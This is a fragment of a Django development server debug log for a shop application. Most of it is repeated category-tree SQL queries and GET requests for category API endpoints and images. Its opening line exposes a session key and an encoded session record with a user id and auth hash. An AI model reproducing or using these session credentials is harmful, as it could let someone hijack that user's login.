args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 14, 0, 39, 46403, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [13/Dec/2019 14:00:39] "GET /api/v1/categories/ HTTP/1.0" 200 51103 DEBUG 2019-12-13 14:00:56,884 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:00:56,895 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:00:56,901 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:00:56,906 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:00:56,912 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:00:56,916 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:00:56,920 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:00:56,924 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:00:56,929 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:00:56,935 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:00:56,940 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:00:56,944 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:00:56,948 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:00:56,952 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:00:56,958 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:00:56,968 utils 20136 140506667599616 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:00:56,972 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:00:56,977 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:00:56,981 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:00:56,988 utils 20136 140506652825344 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 14:00:56,993 utils 20136 140506667599616 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:00:56,998 utils 20136 140506652825344 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:00:56,999 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:00:57,009 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) [13/Dec/2019 14:00:57] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-13 14:00:57,013 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:00:57,017 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:00:57,021 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:00:57,027 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:00:57,032 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:00:57,041 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:00:57,045 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:00:57,049 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:00:57,055 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:00:57,061 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:00:57,065 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:00:57,070 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:00:57,074 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:00:57,084 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:00:57,089 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:00:57,093 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:00:57,097 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:00:57,101 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:00:57,105 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:00:57,110 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:00:57,114 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:00:57,118 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:00:57,123 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:00:57,127 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:00:57] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [13/Dec/2019 14:00:57] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:57] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:57] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:57] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:57] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:58] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:59] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:59] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:59] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 304 0 [13/Dec/2019 14:00:59] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 304 0 DEBUG 2019-12-13 14:03:53,858 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:03:53,871 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:03:53,877 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:03:53,881 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:03:53,888 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:03:53,892 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:03:53,897 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:03:53,901 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:03:53,905 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:03:53,917 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; 